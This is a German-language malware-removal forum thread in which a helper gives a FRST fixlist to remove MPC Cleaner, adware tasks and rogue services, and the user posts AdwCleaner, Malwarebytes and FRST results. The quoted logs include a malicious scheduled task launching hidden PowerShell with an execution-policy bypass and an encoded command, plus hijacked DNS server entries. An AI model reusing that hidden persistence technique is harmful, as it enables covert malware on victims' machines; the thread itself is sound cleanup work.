Error: (03/29/2016 12:51:11 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2
Error: (03/29/2016 12:51:11 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2
Error: (03/29/2016 12:51:11 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2
Error: (03/29/2016 12:51:11 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2
Error: (03/29/2016 12:51:11 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2
Error: (03/29/2016 12:51:11 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2
Error: (03/29/2016 12:51:11 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2
Error: (03/29/2016 12:51:11 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2
Error: (03/29/2016 12:47:05 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2
Systemfehler:
=============
Error: (03/28/2016 11:05:17 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Euseuchoul" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.
Error: (03/28/2016 10:55:02 PM) (Source: DCOM) (EventID: 10010) (User: NT-AUTORITÄT)
Description: {752073A1-23F2-4396-85F0-8FDB879ED0ED}
Error: (03/28/2016 10:54:43 PM) (Source: DCOM) (EventID: 10010) (User: NT-AUTORITÄT)
Description: {DDCFD26B-FEED-44CD-B71D-79487D2E5E5A}
Error: (03/28/2016 10:52:43 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Fuelf" wurde aufgrund folgenden Fehlers nicht gestartet:
%%2
Error: (03/28/2016 10:52:40 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Arygnarj" wurde aufgrund folgenden Fehlers nicht gestartet:
%%2
Error: (03/22/2016 03:12:52 AM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT-AUTORITÄT)
Description: Installationsfehler: Die Installation des folgenden Updates ist mit Fehler 0x8007045b fehlgeschlagen: Update für Windows 8.1 für x64-Systeme (KB3121255)
Error: (03/22/2016 02:09:04 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Fuelf" wurde aufgrund folgenden Fehlers nicht gestartet:
%%2
Error: (03/22/2016 02:09:00 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Arygnarj" wurde aufgrund folgenden Fehlers nicht gestartet:
%%2
Error: (03/22/2016 02:08:02 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "Superfetch" wurde mit folgendem Fehler beendet:
%%1062
Error: (03/22/2016 02:07:42 AM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: Der Versuch des Dienststeuerungs-Managers, nach dem unerwarteten Beenden des Dienstes "Windows Search" Korrekturmaßnahmen (Neustart des Diensts) durchzuführen, ist fehlgeschlagen. Fehler:
%%1056
CodeIntegrity:
===================================
Date: 2016-01-27 20:34:50.024
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-27 20:33:27.259
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-27 20:31:32.120
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-27 20:31:31.842
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-27 20:31:21.532
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-27 20:31:21.366
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-27 20:31:19.557
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-27 20:31:13.438
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-27 20:31:00.333
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-27 20:31:00.166
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
==================== Speicherinformationen ===========================
Prozessor: Intel(R) Core(TM) i5-3337U CPU @ 1.80GHz
Prozentuale Nutzung des RAM: 41%
Installierter physikalischer RAM: 3971.27 MB
Verfügbarer physikalischer RAM: 2310.89 MB
Summe virtueller Speicher: 8067.27 MB
Verfügbarer virtueller Speicher: 6050.91 MB
==================== Laufwerke ================================
Drive c: (Acer) (Fixed) (Total:449.11 GB) (Free:393.05 GB) NTFS
==================== MBR & Partitionstabelle ==================
========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: 30743A9D)
Partition: GPT.
==================== Ende von Addition.txt ============================
|
|
29.03.2016, 12:49
| #5 |
| /// Malwareteam | MPC Cleaner lässt sich nicht löschen (Maleware) Schritt: 1 Drücke bitte die Windowstaste + R Taste und schreibe notepad in das Ausführen Fenster. Kopiere nun folgenden Text aus der Code-Box in das leere Textdokument Code:
ATTFilter closeprocesses:
HKLM-x32\...\Run: [sun13] => [X]
Winlogon\Notify\igfxcui: igfxdev.dll [X]
HKLM\...\Policies\Explorer: [CDRAutoRun] 1
HKLM\...\Policies\Explorer: [NoDriveAutoRun] 0x00000000
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\Policies\Explorer: [CDRAutoRun] 1
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\Policies\Explorer: [NoDriveAutoRun] 0x00000000
HKU\S-1-5-18\...\Policies\Explorer: [CDRAutoRun] 1
HKU\S-1-5-18\...\Policies\Explorer: [NoDriveAutoRun] 0x00000000
GroupPolicy: Beschränkung - Chrome <======= ACHTUNG
CHR HKLM\SOFTWARE\Policies\Google: Beschränkung <======= ACHTUNG
removeproxy:
Tcpip\Parameters: [NameServer] 82.163.142.70 95.211.158.149
Tcpip\..\Interfaces\{4571CE39-7AA0-4823-8EC3-32F036C84A15}: [DhcpNameServer] 82.163.142.70
Tcpip\..\Interfaces\{F18236D5-1611-402B-B44F-1648D518953D}: [DhcpNameServer] 82.163.142.70
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung <======= ACHTUNG
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKLM -> {CC865B26-C31D-4D23-B17B-96548EEF03F6} URL =
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKU\.DEFAULT -> {0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9} URL =
FF Plugin-x32: @Nero.com/KM -> C:\PROGRA~2\COMMON~1\Nero\BROWSE~1\NPBROW~1.DLL [Keine Datei]
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll [Keine Datei]
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll [Keine Datei]
FF Plugin-x32: samsung.com/SamsungLinkPCPlugin -> C:\Program Files\Samsung\Samsung Link\utils\npSamsungLinkPCPlugin.dll [Keine Datei]
FF SearchPlugin: C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\pyl6c8aa.default\searchplugins\DD1B66D4.xml [2016-03-07]
FF SearchPlugin: C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\searchplugins\DD1B66D4.xml [2016-02-19]
FF HKLM\...\Firefox\Extensions: [{2B9C1FFD-0F35-4D84-96A4-266DBFC4FCEF}] - C:\Program Files\groover240120161838\Firefox\{2B9C1FFD-0F35-4D84-96A4-266DBFC4FCEF}.xpi => nicht gefunden
FF HKLM\...\Firefox\Extensions: [{AD00B37B-5BD6-4ED2-8964-6499F4764071}] - C:\Program Files\shopperz280120160932\Firefox\{AD00B37B-5BD6-4ED2-8964-6499F4764071}.xpi => nicht gefunden
FF HKLM-x32\...\Firefox\Extensions: [{2B9C1FFD-0F35-4D84-96A4-266DBFC4FCEF}] - C:\Program Files\groover240120161838\Firefox\{2B9C1FFD-0F35-4D84-96A4-266DBFC4FCEF}.xpi => nicht gefunden
FF HKLM-x32\...\Firefox\Extensions: [{AD00B37B-5BD6-4ED2-8964-6499F4764071}] - C:\Program Files\shopperz280120160932\Firefox\{AD00B37B-5BD6-4ED2-8964-6499F4764071}.xpi => nicht gefunden
S2 Arygnarj; "C:\Users\Denny\AppData\Roaming\FeykfeCekd\Nohlinbi.exe" -cms [X]
C:\Users\Denny\AppData\Roaming\FeykfeCekd
S2 Fuelf; "C:\Users\Denny\AppData\Roaming\ChnuutEjuryqh\Syyjj.exe" -cms [X]
C:\Users\Denny\AppData\Roaming\ChnuutEjuryqh
S3 IDriverT; "C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe" [X]
2016-03-21 22:23 - 2016-03-21 22:23 - 00000000 ____D C:\WINDOWS\system32\diee
2016-03-21 18:24 - 2016-03-21 18:24 - 00000000 ____D C:\WINDOWS\system32\ebo
2016-03-21 18:16 - 2016-03-28 23:05 - 00000000 ____D C:\Users\Denny\AppData\Roaming\Leihjuef
2016-03-21 18:10 - 2016-03-21 18:10 - 00000000 ____D C:\WINDOWS\system32\oha
2016-03-21 17:33 - 2016-03-21 17:33 - 00000000 ____D C:\WINDOWS\system32\ahua
2016-03-09 18:41 - 2016-03-09 18:41 - 00000000 ____D C:\WINDOWS\system32\wof
2016-03-09 09:38 - 2016-03-09 09:38 - 00000000 ____D C:\WINDOWS\system32\wyfw
2016-03-09 02:47 - 2016-03-09 02:47 - 00000000 ____D C:\WINDOWS\system32\tob
2016-03-09 02:47 - 2016-03-09 02:47 - 00000000 ____D C:\WINDOWS\system32\riv
2016-03-09 02:47 - 2016-03-09 02:47 - 00000000 ____D C:\WINDOWS\system32\baf
emptytemp:
Task: {13B8CF77-9E85-407D-A789-112A0DDF8A7F} - System32\Tasks\Foxvohji => C:\PROGRA~1\SHOPPE~3\Madre.bat
Task: {221D435A-EA55-420E-8423-8ED93C16F2BD} - System32\Tasks\{862ADFBD-2F9C-1196-63CC-68B979092056} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand IAAgADsAOwAgACAAIAA7ACAAIAA7ACAAIAA7ADsAOwAgADsAIAAgACAAOwAgACAAOwA7ADsAOwA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcA (Der Dateneintrag hat 8096 mehr Zeichen).
Task: {6D2FBF57-89ED-48A5-B2E0-752E571395C4} - System32\Tasks\{07238A32-598B-4B2D-8035-1479B16A3DB0} => pcalua.exe -a C:\Users\Denny\AppData\Roaming\yoursearching\UninstallManager.exe -c -ptid=face
Task: {767E686C-0DA9-4ED3-9F7E-C07DBE050AF0} - System32\Tasks\Siaby => C:\PROGRA~1\SHOPPE~1\Imuarb.bat
C:\PROGRA~1\SHOPPE~1
C:\PROGRA~1\SHOPPE~2
C:\PROGRA~1\SHOPPE~3
C:\PROGRA~1\GROOVE~1
C:\Users\Denny\AppData\Roaming\yoursearching
Task: {9DD2C156-62AC-406B-9385-CADD795FD545} - System32\Tasks\Conbyg => C:\PROGRA~1\SHOPPE~1\Jyjdhb.bat
Task: {9FCAB4F1-032C-4A7C-964D-D7642FE7C9C7} - System32\Tasks\Fimgumbo => C:\PROGRA~1\GROOVE~1\Itiulgac.bat
Task: {A641688E-E37E-40B4-9239-4268905DD07C} - System32\Tasks\Vuaga => C:\PROGRA~1\SHOPPE~1\Atoqbiuz.bat
Task: {BE213BAE-DF95-400C-ADD4-F489EA0AEC83} - System32\Tasks\Sitnis => C:\PROGRA~1\SHOPPE~2\Qapwifa.bat
FirewallRules: [{9532778B-533D-41E9-B1C9-7856FDB5133B}] => (Allow) LPort=8743
FirewallRules: [{4D6AF942-EAF0-47BB-B0F4-0359D6091F30}] => (Allow) LPort=8643
FirewallRules: [{9B59EAE9-A372-4F68-B16F-2ECAA3EA515A}] => (Allow) LPort=7676
FirewallRules: [{A4EA84FD-B131-452D-A687-2FC8D2EB78C3}] => (Allow) LPort=7679
FirewallRules: [{15BEFA30-7102-42C0-961B-A344E9E0251A}] => (Allow) LPort=24234
FirewallRules: [{BD3B9774-3F44-4838-8A8F-6414A358A460}] => (Allow) LPort=7900
FirewallRules: [{B428C9A2-4E8F-439D-A91F-894BF3994FC5}] => (Allow) LPort=1900
cmd: dir %appdata% /a d
cmd: dir "C:\Program Files" /a d
Speichere diese bitte als Fixlist.txt auf deinem Desktop (oder dem Verzeichnis in dem sich FRST befindet).
Schritt: 2 Downloade Dir bitte  Malwarebytes Anti-Malware
Schritt: 3 Downloade Dir bitte  AdwCleaner auf deinen Desktop.
Schritt: 4 Bitte starte wieder FRST, setze den Haken bei Addition und drücke auf Untersuchen. Poste bitte wieder die beiden Textdateien, die so entstehen. Bitte poste in deiner nächsten Antwort also:
__________________ Mfg, Rafael ~ I'm storm. I'm calm. I'm fire. I'm ice. I'm burningice. ~  Unterstütze uns mit einer Spende ......... Lob, Kritik oder Wünsche ......... .......... Folge uns auf Facebook .......... Geändert von burningice (29.03.2016 um 12:59 Uhr) |
|
29.03.2016, 18:14
| #6 |
| | MPC Cleaner lässt sich nicht löschen (Maleware) AdwCleaner Code:
ATTFilter # AdwCleaner v5.107 - Bericht erstellt am 29/03/2016 um 18:39:37
# Aktualisiert am 28/03/2016 von Xplode
# Datenbank : 2016-03-28.2 [Server]
# Betriebssystem : Windows 8.1 (x64)
# Benutzername : Denny - SCHNEIDER
# Gestartet von : C:\Users\Denny\Desktop\AdwCleaner_5.107.exe
# Option : Löschen
# Unterstützung : hxxp://toolslib.net/forum
***** [ Dienste ] *****
[-] Dienst Gelöscht : MPCProtectService
[-] Dienst Gelöscht : MPCKpt
***** [ Ordner ] *****
[#] Ordner Gelöscht : C:\Program Files (x86)\MPC Cleaner
[-] Ordner Gelöscht : C:\Users\Administrator\AppData\Local\torch
***** [ Dateien ] *****
***** [ DLLs ] *****
***** [ Verknüpfungen ] *****
***** [ Aufgabenplanung ] *****
***** [ Registrierungsdatenbank ] *****
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\DriverRestore.exe
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\MPC
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564
[-] Schlüssel Gelöscht : HKU\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\DataMngr_Toolbar
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Internet Explorer\DOMStorage\www-mysearch.com
[-] Wert Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Run [Web Companion]
[#] Wert Gelöscht : HKU\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Windows\CurrentVersion\Run [Web Companion]
[-] Wert Gelöscht : HKU\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run [Web Companion]
[-] Wert Gelöscht : HKU\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Windows\CurrentVersion\Run [Web Companion]
[-] Wert Gelöscht : HKU\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run [Web Companion]
***** [ Internetbrowser ] *****
*************************
:: "Tracing" Schlüssel gelöscht
:: Proxy Einstellungen zurückgesetzt
:: Winsock Einstellungen zurückgesetzt
:: Internet Explorer Richtlinien gelöscht
:: Chrome Richtlinien gelöscht
*************************
C:\AdwCleaner\AdwCleaner[C1].txt - [55641 Bytes] - [21/03/2016 23:15:16]
C:\AdwCleaner\AdwCleaner[C2].txt - [2005 Bytes] - [21/03/2016 23:37:43]
C:\AdwCleaner\AdwCleaner[C3].txt - [2192 Bytes] - [22/03/2016 00:11:43]
C:\AdwCleaner\AdwCleaner[C4].txt - [2122 Bytes] - [22/03/2016 02:07:09]
C:\AdwCleaner\AdwCleaner[C5].txt - [2617 Bytes] - [29/03/2016 18:39:37]
C:\AdwCleaner\AdwCleaner[S1].txt - [66192 Bytes] - [21/03/2016 22:54:31]
C:\AdwCleaner\AdwCleaner[S2].txt - [66455 Bytes] - [21/03/2016 23:13:26]
C:\AdwCleaner\AdwCleaner[S3].txt - [1759 Bytes] - [21/03/2016 23:32:32]
C:\AdwCleaner\AdwCleaner[S4].txt - [1951 Bytes] - [22/03/2016 00:00:41]
C:\AdwCleaner\AdwCleaner[S5].txt - [1977 Bytes] - [22/03/2016 01:47:49]
C:\AdwCleaner\AdwCleaner[S6].txt - [2842 Bytes] - [29/03/2016 18:21:02]
########## EOF - C:\AdwCleaner\AdwCleaner[C5].txt - [3130 Bytes] ##########
Code:
ATTFilter Malwarebytes Anti-Malware www.malwarebytes.org Suchlaufdatum: 29.03.2016 Suchlaufzeit: 16:50 Protokolldatei: mbam.txt Administrator: Ja Version: 2.2.1.1043 Malware-Datenbank: v2016.03.29.04 Rootkit-Datenbank: v2016.03.12.01 Lizenz: Testversion Malware-Schutz: Aktiviert Schutz vor bösartigen Websites: Aktiviert Selbstschutz: Deaktiviert Betriebssystem: Windows 8.1 CPU: x64 Dateisystem: NTFS Benutzer: Denny Suchlauftyp: Bedrohungssuchlauf Ergebnis: Abgeschlossen Durchsuchte Objekte: 534654 Abgelaufene Zeit: 1 Std., 8 Min., 5 Sek. Speicher: Aktiviert Start: Aktiviert Dateisystem: Aktiviert Archive: Aktiviert Rootkits: Deaktiviert Heuristik: Aktiviert PUP: Aktiviert PUM: Aktiviert Prozesse: 0 (keine bösartigen Elemente erkannt) Module: 0 (keine bösartigen Elemente erkannt) Registrierungsschlüssel: 0 (keine bösartigen Elemente erkannt) Registrierungswerte: 0 (keine bösartigen Elemente erkannt) Registrierungsdaten: 0 (keine bösartigen Elemente erkannt) Ordner: 0 (keine bösartigen Elemente erkannt) Dateien: 0 (keine bösartigen Elemente erkannt) Physische Sektoren: 0 (keine bösartigen Elemente erkannt) (end) Code:
ATTFilter Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
durchgeführt von Denny (2016-03-29 16:34:46) Run:1
Gestartet von C:\Users\Denny\Desktop
Geladene Profile: Denny (Verfügbare Profile: Denny & Administrator)
Start-Modus: Normal
==============================================
fixlist Inhalt:
*****************
closeprocesses:
HKLM-x32\...\Run: [sun13] => [X]
Winlogon\Notify\igfxcui: igfxdev.dll [X]
HKLM\...\Policies\Explorer: [CDRAutoRun] 1
HKLM\...\Policies\Explorer: [NoDriveAutoRun] 0x00000000
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\Policies\Explorer: [CDRAutoRun] 1
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\Policies\Explorer: [NoDriveAutoRun] 0x00000000
HKU\S-1-5-18\...\Policies\Explorer: [CDRAutoRun] 1
HKU\S-1-5-18\...\Policies\Explorer: [NoDriveAutoRun] 0x00000000
GroupPolicy: Beschränkung - Chrome <======= ACHTUNG
CHR HKLM\SOFTWARE\Policies\Google: Beschränkung <======= ACHTUNG
removeproxy:
Tcpip\Parameters: [NameServer] 82.163.142.70 95.211.158.149
Tcpip\..\Interfaces\{4571CE39-7AA0-4823-8EC3-32F036C84A15}: [DhcpNameServer] 82.163.142.70
Tcpip\..\Interfaces\{F18236D5-1611-402B-B44F-1648D518953D}: [DhcpNameServer] 82.163.142.70
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung <======= ACHTUNG
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKLM -> {CC865B26-C31D-4D23-B17B-96548EEF03F6} URL =
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKU\.DEFAULT -> {0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9} URL =
FF Plugin-x32: @Nero.com/KM -> C:\PROGRA~2\COMMON~1\Nero\BROWSE~1\NPBROW~1.DLL [Keine Datei]
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll [Keine Datei]
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll [Keine Datei]
FF Plugin-x32: samsung.com/SamsungLinkPCPlugin -> C:\Program Files\Samsung\Samsung Link\utils\npSamsungLinkPCPlugin.dll [Keine Datei]
FF SearchPlugin: C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\pyl6c8aa.default\searchplugins\DD1B66D4.xml [2016-03-07]
FF SearchPlugin: C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\searchplugins\DD1B66D4.xml [2016-02-19]
FF HKLM\...\Firefox\Extensions: [{2B9C1FFD-0F35-4D84-96A4-266DBFC4FCEF}] - C:\Program Files\groover240120161838\Firefox\{2B9C1FFD-0F35-4D84-96A4-266DBFC4FCEF}.xpi => nicht gefunden
FF HKLM\...\Firefox\Extensions: [{AD00B37B-5BD6-4ED2-8964-6499F4764071}] - C:\Program Files\shopperz280120160932\Firefox\{AD00B37B-5BD6-4ED2-8964-6499F4764071}.xpi => nicht gefunden
FF HKLM-x32\...\Firefox\Extensions: [{2B9C1FFD-0F35-4D84-96A4-266DBFC4FCEF}] - C:\Program Files\groover240120161838\Firefox\{2B9C1FFD-0F35-4D84-96A4-266DBFC4FCEF}.xpi => nicht gefunden
FF HKLM-x32\...\Firefox\Extensions: [{AD00B37B-5BD6-4ED2-8964-6499F4764071}] - C:\Program Files\shopperz280120160932\Firefox\{AD00B37B-5BD6-4ED2-8964-6499F4764071}.xpi => nicht gefunden
S2 Arygnarj; "C:\Users\Denny\AppData\Roaming\FeykfeCekd\Nohlinbi.exe" -cms [X]
C:\Users\Denny\AppData\Roaming\FeykfeCekd
S2 Fuelf; "C:\Users\Denny\AppData\Roaming\ChnuutEjuryqh\Syyjj.exe" -cms [X]
C:\Users\Denny\AppData\Roaming\ChnuutEjuryqh
S3 IDriverT; "C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe" [X]
2016-03-21 22:23 - 2016-03-21 22:23 - 00000000 ____D C:\WINDOWS\system32\diee
2016-03-21 18:24 - 2016-03-21 18:24 - 00000000 ____D C:\WINDOWS\system32\ebo
2016-03-21 18:16 - 2016-03-28 23:05 - 00000000 ____D C:\Users\Denny\AppData\Roaming\Leihjuef
2016-03-21 18:10 - 2016-03-21 18:10 - 00000000 ____D C:\WINDOWS\system32\oha
2016-03-21 17:33 - 2016-03-21 17:33 - 00000000 ____D C:\WINDOWS\system32\ahua
2016-03-09 18:41 - 2016-03-09 18:41 - 00000000 ____D C:\WINDOWS\system32\wof
2016-03-09 09:38 - 2016-03-09 09:38 - 00000000 ____D C:\WINDOWS\system32\wyfw
2016-03-09 02:47 - 2016-03-09 02:47 - 00000000 ____D C:\WINDOWS\system32\tob
2016-03-09 02:47 - 2016-03-09 02:47 - 00000000 ____D C:\WINDOWS\system32\riv
2016-03-09 02:47 - 2016-03-09 02:47 - 00000000 ____D C:\WINDOWS\system32\baf
emptytemp:
Task: {13B8CF77-9E85-407D-A789-112A0DDF8A7F} - System32\Tasks\Foxvohji => C:\PROGRA~1\SHOPPE~3\Madre.bat
Task: {221D435A-EA55-420E-8423-8ED93C16F2BD} - System32\Tasks\{862ADFBD-2F9C-1196-63CC-68B979092056} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand IAAgADsAOwAgACAAIAA7ACAAIAA7ACAAIAA7ADsAOwAgADsAIAAgACAAOwAgACAAOwA7ADsAOwA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcA (Der Dateneintrag hat 8096 mehr Zeichen).
Task: {6D2FBF57-89ED-48A5-B2E0-752E571395C4} - System32\Tasks\{07238A32-598B-4B2D-8035-1479B16A3DB0} => pcalua.exe -a C:\Users\Denny\AppData\Roaming\yoursearching\UninstallManager.exe -c -ptid=face
Task: {767E686C-0DA9-4ED3-9F7E-C07DBE050AF0} - System32\Tasks\Siaby => C:\PROGRA~1\SHOPPE~1\Imuarb.bat
C:\PROGRA~1\SHOPPE~1
C:\PROGRA~1\SHOPPE~2
C:\PROGRA~1\SHOPPE~3
C:\PROGRA~1\GROOVE~1
C:\Users\Denny\AppData\Roaming\yoursearching
Task: {9DD2C156-62AC-406B-9385-CADD795FD545} - System32\Tasks\Conbyg => C:\PROGRA~1\SHOPPE~1\Jyjdhb.bat
Task: {9FCAB4F1-032C-4A7C-964D-D7642FE7C9C7} - System32\Tasks\Fimgumbo => C:\PROGRA~1\GROOVE~1\Itiulgac.bat
Task: {A641688E-E37E-40B4-9239-4268905DD07C} - System32\Tasks\Vuaga => C:\PROGRA~1\SHOPPE~1\Atoqbiuz.bat
Task: {BE213BAE-DF95-400C-ADD4-F489EA0AEC83} - System32\Tasks\Sitnis => C:\PROGRA~1\SHOPPE~2\Qapwifa.bat
FirewallRules: [{9532778B-533D-41E9-B1C9-7856FDB5133B}] => (Allow) LPort=8743
FirewallRules: [{4D6AF942-EAF0-47BB-B0F4-0359D6091F30}] => (Allow) LPort=8643
FirewallRules: [{9B59EAE9-A372-4F68-B16F-2ECAA3EA515A}] => (Allow) LPort=7676
FirewallRules: [{A4EA84FD-B131-452D-A687-2FC8D2EB78C3}] => (Allow) LPort=7679
FirewallRules: [{15BEFA30-7102-42C0-961B-A344E9E0251A}] => (Allow) LPort=24234
FirewallRules: [{BD3B9774-3F44-4838-8A8F-6414A358A460}] => (Allow) LPort=7900
FirewallRules: [{B428C9A2-4E8F-439D-A91F-894BF3994FC5}] => (Allow) LPort=1900
cmd: dir %appdata% /a d
cmd: dir "C:\Program Files" /a d
*****************
Prozess erfolgreich geschlossen.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\sun13 => Wert erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\igfxcui" => Schlüssel erfolgreich entfernt
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\CDRAutoRun => Wert erfolgreich entfernt
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoDriveAutoRun => Wert erfolgreich entfernt
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\CDRAutoRun => Wert erfolgreich entfernt
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoDriveAutoRun => Wert erfolgreich entfernt
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\CDRAutoRun => Wert erfolgreich entfernt
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoDriveAutoRun => Wert erfolgreich entfernt
C:\WINDOWS\system32\GroupPolicy\Machine => erfolgreich verschoben
C:\WINDOWS\system32\GroupPolicy\GPT.ini => erfolgreich verschoben
C:\WINDOWS\SysWOW64\GroupPolicy\GPT.ini => erfolgreich verschoben
